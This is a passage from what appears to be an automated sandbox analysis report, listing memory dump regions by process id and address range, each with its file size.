                                                                                  • memory/4972-177-0x0000000000400000-0x00000000029F4000-memory.dmp

                                                                                    Filesize

                                                                                    38.0MB

                                                                                  • memory/5028-85-0x0000000000D90000-0x0000000000D9D000-memory.dmp

                                                                                    Filesize

                                                                                    52KB

                                                                                  • memory/5028-129-0x0000000000400000-0x0000000000444000-memory.dmp

                                                                                    Filesize

                                                                                    272KB

                                                                                  • memory/5060-80-0x0000000002330000-0x0000000002332000-memory.dmp

                                                                                    Filesize

                                                                                    8KB

                                                                                  • memory/5060-73-0x0000000002340000-0x0000000002CE0000-memory.dmp

                                                                                    Filesize

                                                                                    9.6MB

                                                                                  • memory/5092-159-0x0000000000400000-0x0000000000449000-memory.dmp

                                                                                    Filesize

                                                                                    292KB

                                                                                  • memory/5092-169-0x0000000000400000-0x0000000000449000-memory.dmp

                                                                                    Filesize

                                                                                    292KB

                                                                                  • memory/5180-203-0x0000000140000000-0x0000000140383000-memory.dmp

                                                                                    Filesize

                                                                                    3.5MB

                                                                                  • memory/5180-214-0x0000000140000000-0x0000000140383000-memory.dmp

                                                                                    Filesize

                                                                                    3.5MB

                                                                                  • memory/5268-238-0x0000000077BF4000-0x0000000077BF5000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/5268-263-0x0000000005892000-0x0000000005893000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/5268-264-0x0000000005893000-0x0000000005894000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/5268-252-0x0000000003430000-0x0000000003431000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/5268-254-0x00000000703D0000-0x0000000070ABE000-memory.dmp

                                                                                    Filesize

                                                                                    6.9MB

                                                                                  • memory/5268-259-0x0000000005740000-0x0000000005762000-memory.dmp

                                                                                    Filesize

                                                                                    136KB

                                                                                  • memory/5268-227-0x0000000000400000-0x0000000000FE1000-memory.dmp

                                                                                    Filesize

                                                                                    11.9MB

                                                                                  • memory/5268-248-0x0000000000401000-0x000000000041B000-memory.dmp

                                                                                    Filesize

                                                                                    104KB

                                                                                  • memory/5268-256-0x00000000033D0000-0x00000000033F3000-memory.dmp

                                                                                    Filesize

                                                                                    140KB

                                                                                  • memory/5268-262-0x0000000005890000-0x0000000005891000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/5312-218-0x00000000002C0000-0x00000000002C1000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/5312-220-0x0000000000DC0000-0x0000000000DC1000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/5312-225-0x0000000002590000-0x0000000002591000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/5312-224-0x0000000004C50000-0x0000000004C8B000-memory.dmp

                                                                                    Filesize

                                                                                    236KB

                                                                                  • memory/5312-223-0x0000000004CE0000-0x0000000004CE1000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/5312-213-0x00000000703D0000-0x0000000070ABE000-memory.dmp

                                                                                    Filesize

                                                                                    6.9MB

                                                                                  • memory/5340-215-0x0000000140000000-0x000000014070A000-memory.dmp

                                                                                    Filesize

                                                                                    7.0MB

                                                                                  • memory/5340-222-0x0000000140000000-0x000000014070A000-memory.dmp

                                                                                    Filesize

                                                                                    7.0MB

                                                                                  • memory/5340-221-0x000001BB99790000-0x000001BB997A4000-memory.dmp

                                                                                    Filesize

                                                                                    80KB

                                                                                  • memory/5752-239-0x0000000004DF0000-0x0000000004DF1000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/5824-251-0x0000000000400000-0x0000000000450000-memory.dmp

                                                                                    Filesize

                                                                                    320KB

                                                                                  • memory/5824-249-0x0000000002F40000-0x0000000002F41000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/5824-250-0x0000000002B00000-0x0000000002B4C000-memory.dmp

                                                                                    Filesize

                                                                                    304KB

                                                                                  • memory/6032-261-0x00000000703D0000-0x0000000070ABE000-memory.dmp

                                                                                    Filesize

                                                                                    6.9MB